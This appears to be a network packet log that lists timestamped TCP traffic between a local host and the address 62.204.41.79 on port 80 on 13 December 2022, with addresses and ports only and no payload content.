                                              Dec 13, 2022 20:09:17.139194965 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.139220953 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.139239073 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.139256001 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.139605045 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.139627934 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.139645100 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.139662027 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.139678955 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.143856049 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.143965960 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.144068956 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.144156933 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.144249916 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.144335032 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.144439936 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.144527912 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.144620895 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.144706011 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.144798994 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.144882917 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.144974947 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.145071030 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.145164967 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.145253897 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.145344973 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.145431042 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.145528078 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.145612001 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.145711899 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.145900011 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.145934105 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.146286011 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.146286964 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.146413088 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.146543026 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.146671057 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.146811962 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.146943092 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.147064924 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.147186041 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.147308111 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.147428036 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.147557020 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.147689104 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.151055098 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.151139975 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.151242018 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.151343107 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.151438951 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.151526928 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.151704073 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.151891947 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.152025938 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.152079105 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.152170897 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.152256966 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.152349949 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.152447939 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.152543068 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.152627945 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.152721882 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.163935900 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.164360046 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.164510965 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.164906025 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.165206909 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.165652990 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.165913105 CET804974562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.166166067 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.166790009 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.166924000 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.167682886 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.167849064 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.167979956 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.168103933 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.168113947 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.168138981 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.168158054 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.168176889 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.168201923 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.168220043 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.168236971 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.168853998 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.168889999 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.168951035 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.168970108 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.168991089 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.169008970 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.169035912 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.169053078 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.169151068 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.169183016 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.169332027 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.169388056 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.169464111 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.169518948 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.169717073 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.169718027 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.169837952 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.169960976 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.170075893 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.170193911 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.170310020 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.170430899 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.170562983 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.170684099 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.170810938 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.170938969 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.171065092 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.171199083 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.171325922 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.171504021 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.171639919 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.171768904 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.171895027 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.172013998 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.172138929 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.172266006 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.172749043 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.173012018 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.173053980 CET804974562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.173131943 CET4974580192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.173760891 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.174401999 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.174514055 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.174649954 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.174773932 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.174900055 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.175024033 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.175149918 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.175275087 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.175395966 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.175519943 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.205074072 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.205110073 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.205147028 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.205328941 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.205411911 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.205581903 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.205666065 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.205689907 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.205707073 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.205724955 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.205743074 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.205761909 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.205904961 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.205987930 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.206197977 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.206279993 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.206372976 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.206602097 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.206633091 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.206857920 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.206922054 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.206945896 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.207015038 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.207390070 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.207422972 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.207484007 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.207550049 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.207621098 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.207716942 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.207920074 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.208055973 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.208132982 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.211833000 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.211874008 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.211930990 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.213227987 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.214270115 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.214308023 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.214332104 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.214354038 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.214375973 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.214396954 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.214418888 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.214438915 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.214459896 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.214482069 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.225030899 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.225061893 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.225074053 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.225507021 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.226558924 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.226845980 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.227427006 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.228051901 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.228080034 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.228313923 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.228451014 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.228660107 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.228831053 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.229691982 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.229929924 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.229985952 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.230186939 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.230901957 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.230973005 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.230993032 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.231009960 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.231025934 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.231044054 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.231060982 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.231076956 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.231123924 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.231260061 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.231470108 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.231861115 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.231889009 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.231915951 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.231951952 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.231972933 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.231992006 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.232086897 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.232223034 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.232424021 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.232449055 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.232882977 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.232984066 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.233426094 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.233624935 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.234297037 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.234936953 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.234983921 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.235233068 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.235311985 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.235575914 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.235589027 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.235615015 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.235778093 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.235871077 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.236051083 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.254934072 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.255093098 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.255198956 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.255286932 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.255392075 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.255528927 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.255625963 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.255712986 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.255809069 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.255934000 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.256124020 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.256254911 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.256395102 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.256525040 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.256685972 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.256828070 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.256994963 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.258322001 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.258460999 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.258590937 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.258708000 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.258945942 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.258945942 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.259063005 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.259191036 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.259330034 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.259442091 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.259562969 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.259689093 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.259814978 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.259948015 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.260066032 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.260194063 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.260329962 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.260456085 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.260586023 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.260718107 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.260853052 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.260981083 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.261097908 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.261224031 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.261354923 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.261893034 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.262006998 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.262118101 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.262283087 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.262453079 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.262552977 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.292948008 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.295742989 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.295852900 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.295948029 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.296041965 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.296200991 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.296230078 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.296315908 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.296411037 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.296499014 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.296593904 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.296680927 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.296772003 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.296860933 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.296955109 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.297046900 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.297133923 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.297220945 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.297314882 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.297404051 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.297499895 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.297586918 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.297681093 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.297770977 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.297864914 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.297955036 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.298053026 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.298141003 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.298239946 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.300656080 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.300791979 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.301785946 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.301898003 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.302867889 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.302989006 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.304764032 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.304858923 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.305984020 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.306096077 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.307292938 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.307401896 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.307506084 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.307595015 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.307691097 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.307780981 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.307877064 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.309084892 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.309202909 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.310692072 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.312192917 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.313564062 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.315043926 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.315182924 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.317511082 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.317570925 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.319000006 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.319048882 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.319077969 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.319220066 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.319452047 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.319545031 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.319669008 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.319746017 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.319988966 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.320031881 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.320137024 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.320306063 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.320380926 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.320507050 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.320703030 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.320818901 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.320903063 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.321052074 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.321190119 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.321389914 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.321474075 CET804973662.204.41.79192.168.2.3
